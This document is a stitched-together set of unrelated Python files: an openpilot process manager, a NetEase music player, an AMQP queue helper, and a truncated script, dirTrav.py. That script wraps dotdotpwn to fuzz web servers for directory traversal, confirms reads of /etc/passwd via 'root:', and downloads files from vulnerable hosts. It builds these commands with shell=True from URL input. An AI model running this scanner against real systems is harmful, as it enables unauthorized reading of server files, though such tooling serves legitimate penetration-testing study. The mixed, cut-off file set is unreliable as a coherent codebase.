manager.py
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1040
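# rough count of scons build targets; the build loop below scales progress/TOTAL_SCONS_NODES
# to ~70% of the spinner, and manager_prepare() fills the remaining 30%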
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed, log the errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
# "uploader": "selfdrive.loggerd.uploader",
# "deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
# "ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
# "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
# "updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
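# Entry formats: a string names a Python module launched via launcher() in its own
# multiprocessing.Process; a (directory, argv) tuple is a native binary exec'd from
# BASEDIR/<directory> (see start_managed_process / nativelauncher below).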
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringd',
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
'rtshield',
]
# starting dmonitoringmodeld when modeld is initializing can sometimes
# result in a weird snpe state where dmon constantly uses more cpu than normal.
car_started_processes += ['modeld']
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
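# hypothetical usage (nothing in this file calls it):
#   register_managed_process("example_d", "selfdrive.example.example_d", car_started=True)
# registers a Python process that starts/stops with the car; with car_started=False it is
# added to persistent_processes instead.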
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
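# signal 0 delivers nothing; it only raises OSError if the pid no longer exists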
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# prebuilt builds use the full 0-100 range; otherwise the scons step above already advanced the spinner to 70%, so continue from there
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("IsOpenpilotViewEnabled", "0"),
("OpkrAutoShutdown", "3"),
("OpkrAutoScreenOff", "0"),
("OpkrUIBrightness", "0"),
("OpkrEnableDriverMonitoring", "1"),
("OpkrEnableLogger", "0"),
("OpkrEnableGetoffAlert", "1"),
("OpkrAutoResume", "1"),
("OpkrVariableCruise", "0"),
("OpkrLaneChangeSpeed", "60"),
("OpkrAutoLaneChangeDelay", "0"),
("OpkrSteerAngleCorrection", "0"),
("PutPrebuiltOn", "0"),
("FingerprintIssuedFix", "0"),
("LdwsCarFix", "0"),
("LateralControlMethod", "0"),
("CruiseStatemodeSelInit", "1"),
("InnerLoopGain", "30"),
("OuterLoopGain", "20"),
("TimeConstant", "10"),
("ActuatorEffectiveness", "15"),
("Scale", "1750"),
("LqrKi", "10"),
("DcGain", "30"),
("IgnoreZone", "0"),
("PidKp", "20"),
("PidKi", "40"),
("PidKf", "5"),
("CameraOffsetAdj", "60"),
("SteerRatioAdj", "135"),
("SteerActuatorDelayAdj", "35"),
("SteerRateCostAdj", "50"),
("SteerLimitTimerAdj", "80"),
("TireStiffnessFactorAdj", "75"),
("SteerMaxAdj", "380"),
("SteerDeltaUpAdj", "3"),
("SteerDeltaDownAdj", "7"),
("SteerMaxvAdj", "10"),
("OpkrBatteryChargingControl", "1"),
("OpkrBatteryChargingMin", "70"),
("OpkrBatteryChargingMax", "80"),
("OpkrUiOpen", "0"),
("OpkrDriveOpen", "0"),
("OpkrTuneOpen", "0"),
("OpkrControlOpen", "0"),
("LeftCurvOffsetAdj", "0"),
("RightCurvOffsetAdj", "0"),
("DebugUi1", "0"),
("DebugUi2", "0"),
("OpkrBlindSpotDetect", "0"),
("OpkrMaxAngleLimit", "90"),
("OpkrAutoResumeOption", "0"),
("OpkrAngleOffsetSelect", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
player.py
#!/usr/bin/env python
#encoding: UTF-8
'''
NetEase Cloud Music Player
'''
# Let's make some noise
import subprocess
import threading
import time
import os
import signal
import random
from .ui import Ui
# carousel x in [left, right]
carousel = lambda left, right, x: left if (x>right) else (right if x<left else x)
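# e.g. carousel(0, 4, 5) -> 0 (wraps past the right edge), carousel(0, 4, -1) -> 4, carousel(0, 4, 2) -> 2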
class Player:
def __init__(self):
self.PLAY_MODE_NORMAL = 1
self.PLAY_MODE_SHUFFLE = 2
self.PLAY_MODE_REPEAT = 3
self.ui = Ui()
self.datatype = 'songs'
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
self.pause_flag = False
self.play_mode = self.PLAY_MODE_NORMAL
self.songs = []
self.idx = 0
self.q_level = 0
def popen_recall(self, onExit, popenArgs):
"""
Runs the given args in a subprocess.Popen, and then calls the function
onExit when the subprocess completes.
onExit is a callable object, and popenArgs is a list/tuple of args that
would be passed to subprocess.Popen.
"""
def runInThread(onExit, popenArgs):
self.popen_handler = subprocess.Popen(['mpg123', popenArgs], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# auto-decrease quality level: [hMusic, bMusic, mMusic, defaultMusic, lMusic]
if self.q_level != 4:
count = 20
for line in self.popen_handler.stderr:
if count == 0:
self.q_level += 2
self.next()
return
count -= 1
self.popen_handler.wait()
if self.playing_flag:
self.idx = carousel(0, len(self.songs)-1, self.idx+1 )
onExit()
return
thread = threading.Thread(target=runInThread, args=(onExit, popenArgs))
thread.start()
# returns immediately after the thread starts
return thread
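# within this class, recall() passes itself as onExit, so when one track's mpg123
# process exits the next track starts automatically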
def notify(self, item, executable='notify-send'):
try:
# macOS: show the notification via osascript
msg = 'display notification "' + item['artist'] + ' < ' + item['album_name'] + ' >' + '" with title "' + item['song_name'] +'"'
subprocess.Popen(['osascript', '-e', msg])
except:
# no osascript (e.g. Linux): fall back to fetching the cover art and using notify-send
cover_path = os.path.expanduser('~') + \
'/netease-musicbox/cover.jpg'
song_info = "%s-%s \n %s" \
% (item['album_name'], item['song_name'], item['artist'])
with open(os.devnull, 'w') as fnull:
handler = subprocess.Popen(['curl', item['cover_url'], '-o', cover_path],
stdout=fnull, stderr=subprocess.STDOUT)
handler.wait()
handler = subprocess.Popen(['convert', cover_path, '-resize', '150x150', cover_path],
stdout=fnull, stderr=subprocess.STDOUT)
handler.wait()
handler = subprocess.Popen(['notify-send', '-i', cover_path, '-t', '3000', song_info],
stdout=fnull, stderr=subprocess.STDOUT)
def recall(self):
self.playing_flag = True
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], item['mp3'][self.q_level]['bitrate'])
self.popen_recall(self.recall, item['mp3'][self.q_level]['mp3_url'])
self.notify(item)
def play(self, datatype, songs, idx):
# if same playlists && idx --> same song :: pause/resume it
self.datatype = datatype
if len(songs) and (datatype == 'songs' or datatype == 'djchannels'):
if idx == self.idx and songs == self.songs:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
if datatype == 'songs' or datatype == 'djchannels':
self.songs = songs
self.idx = idx
# if it's playing
if self.playing_flag:
self.switch()
# start new play
else:
self.recall()
# if current menu is not song, pause/resume
else:
if self.playing_flag:
if self.pause_flag:
self.resume()
else:
self.pause()
else:
pass
# play another
def switch(self):
self.stop()
# wait for the process to be killed
time.sleep(0.01)
self.recall()
def stop(self):
if self.playing_flag and self.popen_handler:
self.playing_flag = False
self.popen_handler.kill()
def pause(self):
self.pause_flag = True
os.kill(self.popen_handler.pid, signal.SIGSTOP)
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], bitrate=item['mp3'][self.q_level]['bitrate'], pause=True)
def resume(self):
self.pause_flag = False
os.kill(self.popen_handler.pid, signal.SIGCONT)
item = self.songs[ self.idx ]
self.ui.build_playinfo(item['song_name'], item['artist'], item['album_name'], bitrate=item['mp3'][self.q_level]['bitrate'])
def next(self):
self.stop()
time.sleep(0.01)
if self.play_mode == self.PLAY_MODE_NORMAL:
self.idx = carousel(0, len(self.songs)-1, self.idx+1 )
elif self.play_mode == self.PLAY_MODE_SHUFFLE:
self.idx = random.sample(range(0, len(self.songs)), 1)[0]
self.recall()
def prev(self):
self.stop()
time.sleep(0.01)
self.idx = carousel(0, len(self.songs)-1, self.idx-1 )
self.recall()
amqp_exchange.py
try:
import kombu
from kombu import pools
except ImportError:
kombu = None
import socket
import logging
import threading
from time import sleep
log = logging.getLogger(__name__)
KOMBU_UNAVAILABLE = "Attempting to bind to AMQP message queue, but kombu dependency unavailable"
DEFAULT_EXCHANGE_NAME = "lwr"
DEFAULT_EXCHANGE_TYPE = "direct"
# Set timeout to periodically give up looking and check if polling should end.
DEFAULT_TIMEOUT = 0.2
DEFAULT_HEARTBEAT = 580
DEFAULT_RECONNECT_CONSUMER_WAIT = 1
DEFAULT_HEARTBEAT_WAIT = 1
class LwrExchange(object):
""" Utility for publishing and consuming structured LWR queues using kombu.
This is shared between the server and client - an exchange should be set up
for each manager (or, in the case of the client, each manager one wishes to
communicate with).
Each LWR manager is defined solely by name in the scheme, so only one LWR
should target each AMQP endpoint, or care should be taken that unique
manager names are used across LWR servers targeting the same AMQP endpoint -
and in particular only one such LWR should define a default manager with
name _default_.
"""
def __init__(
self,
url,
manager_name,
connect_ssl=None,
timeout=DEFAULT_TIMEOUT,
publish_kwds={},
):
"""
"""
if not kombu:
raise Exception(KOMBU_UNAVAILABLE)
self.__url = url
self.__manager_name = manager_name
self.__connect_ssl = connect_ssl
self.__exchange = kombu.Exchange(DEFAULT_EXCHANGE_NAME, DEFAULT_EXCHANGE_TYPE)
self.__timeout = timeout
# Be sure to log message publishing failures.
if publish_kwds.get("retry", False):
if "retry_policy" not in publish_kwds:
publish_kwds["retry_policy"] = {}
if "errback" not in publish_kwds["retry_policy"]:
publish_kwds["retry_policy"]["errback"] = self.__publish_errback
self.__publish_kwds = publish_kwds
@property
def url(self):
return self.__url
def consume(self, queue_name, callback, check=True, connection_kwargs={}):
queue = self.__queue(queue_name)
log.debug("Consuming queue '%s'", queue)
while check:
heartbeat_thread = None
try:
with self.connection(self.__url, heartbeat=DEFAULT_HEARTBEAT, **connection_kwargs) as connection:
with kombu.Consumer(connection, queues=[queue], callbacks=[callback], accept=['json']):
heartbeat_thread = self.__start_heartbeat(queue_name, connection)
while check and connection.connected:
try:
connection.drain_events(timeout=self.__timeout)
except socket.timeout:
pass
except (IOError, socket.error) as exc:
# In testing, errno is None
log.warning('Got %s, will retry: %s', exc.__class__.__name__, exc)
if heartbeat_thread:
heartbeat_thread.join()
sleep(DEFAULT_RECONNECT_CONSUMER_WAIT)
def heartbeat(self, connection):
log.debug('AMQP heartbeat thread alive')
while connection.connected:
connection.heartbeat_check()
sleep(DEFAULT_HEARTBEAT_WAIT)
log.debug('AMQP heartbeat thread exiting')
def publish(self, name, payload):
with self.connection(self.__url) as connection:
with pools.producers[connection].acquire() as producer:
key = self.__queue_name(name)
producer.publish(
payload,
serializer='json',
exchange=self.__exchange,
declare=[self.__exchange],
routing_key=key,
**self.__publish_kwds
)
def __publish_errback(self, exc, interval):
log.error("Connection error while publishing: %r", exc, exc_info=1)
log.info("Retrying in %s seconds", interval)
def connection(self, connection_string, **kwargs):
if "ssl" not in kwargs:
kwargs["ssl"] = self.__connect_ssl
return kombu.Connection(connection_string, **kwargs)
def __queue(self, name):
queue_name = self.__queue_name(name)
queue = kombu.Queue(queue_name, self.__exchange, routing_key=queue_name)
return queue
def __queue_name(self, name):
key_prefix = self.__key_prefix()
queue_name = '%s_%s' % (key_prefix, name)
return queue_name
def __key_prefix(self):
if self.__manager_name == "_default_":
key_prefix = "lwr_"
else:
key_prefix = "lwr_%s_" % self.__manager_name
return key_prefix
def __start_heartbeat(self, queue_name, connection):
thread_name = "consume-heartbeat-%s" % (self.__queue_name(queue_name))
thread = threading.Thread(name=thread_name, target=self.heartbeat, args=(connection,))
thread.start()
return thread
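# Minimal usage sketch (not part of the original module; the broker URL and handler
# below are illustrative assumptions):
#   exchange = LwrExchange("amqp://guest:guest@localhost:5672//", "_default_")
#   exchange.publish("setup", {"job_id": "123"})            # routed to queue "lwr_setup"
#   exchange.consume("setup", lambda body, msg: msg.ack())  # blocks, draining events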
dirTrav.py
#!/usr/bin/python
#ONLY WEB HAS BEEN IMPLEMENTED
#If /usr/share/dotdotpwn/Reports exists, dotdotpwn will automatically put raw results in there for you
#Reconscan.py creates the Reports directory for you
import sys
import os
import subprocess
from subprocess import CalledProcessError
import argparse
import multiprocessing
from multiprocessing import Process, Queue
import requests
import time
from shutil import move
#This function currently runs regular and an extension web scans using ddpwn on a list of URLs
#If something is found, it will output the result to the /dirb/ directory
def dotPwn(URL):
#Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
# Available options:
# -m Module [http | http-url | ftp | tftp | payload | stdout]
# -h Hostname
# -O Operating System detection for intelligent fuzzing (nmap)
# -o Operating System type if known ("windows", "unix" or "generic")
# -s Service version detection (banner grabber)
# -d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
# -f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
# -E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
# -S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
# -u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
# -k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
# -p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
# -x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
# -t Time in milliseconds between each test (default: 300 (.3 second))
# -X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
# -e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
# -U Username (default: 'anonymous')
# -P Password (default: '[email protected]')
# -M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
# -r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
# -b Break after the first vulnerability is found
# -q Quiet mode (doesn't print each attempt)
# -C Continue if no data was received from host
port, resultsOut, baseURL, URL = parseURL(URL)
konfirmString = setDotPwnOptions()
if ("TRAVERSAL" in URL):
DOTPWN = 'dotdotpwn.pl -m http-url -u %s -k %s -d %s -o %s -x %s -t 1 -q -C -b' % (URL, konfirmString, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http-url -u %s -k %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (URL, konfirmString, args.depth, args.os, port, args.extensions)
else:
DOTPWN = 'dotdotpwn.pl -m http -h %s -k %s -d %s -o %s -x %s -t 1 -q -C -b' % (baseURL, konfirmString, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http -h %s -k %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (baseURL, konfirmString, args.depth, args.os, port, args.extensions)
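# e.g. for a hypothetical host 10.1.1.5 on port 80 with the defaults (-d 10, os unix) the
# non-URL form expands to roughly:
#   dotdotpwn.pl -m http -h 10.1.1.5 -k "root:" -d 10 -o unix -x 80 -t 1 -q -C -b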
try:
DOTPWNRESULTS = subprocess.check_output(DOTPWN, shell=True)
except CalledProcessError as ex:
writeOutputFile = True
text = ex.output.split("\n")
for line in text:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s" % resultsOut
print "INFO: Traversals found! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(ex.output)
outFileWriter.close()
except:
raise
if (len(vuln) == 0): #don't run extension scan if we already have a vuln
try:
DOTPWNERESULTS = subprocess.check_output(DOTPWNE, shell=True)
except CalledProcessError as fx:
writeOutputFile = True
textE = fx.output.split("\n")
for line in textE:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s using file extensions" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/E%s" % resultsOut
print "INFO: Traversals found using extensions! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(fx.output)
outFileWriter.close()
except:
raise
if (args.scan_and_retrieve and len(vuln) > 0):
print "INFO: Downloading files"
retrieve()
#grab pieces to build URL, feed in files to grab,
def retrieve():
vulnURLs = analyzeVuln(vuln)
tmp = vulnURLs[0]
vulnProto = tmp[0]
vulnBase = tmp[1]
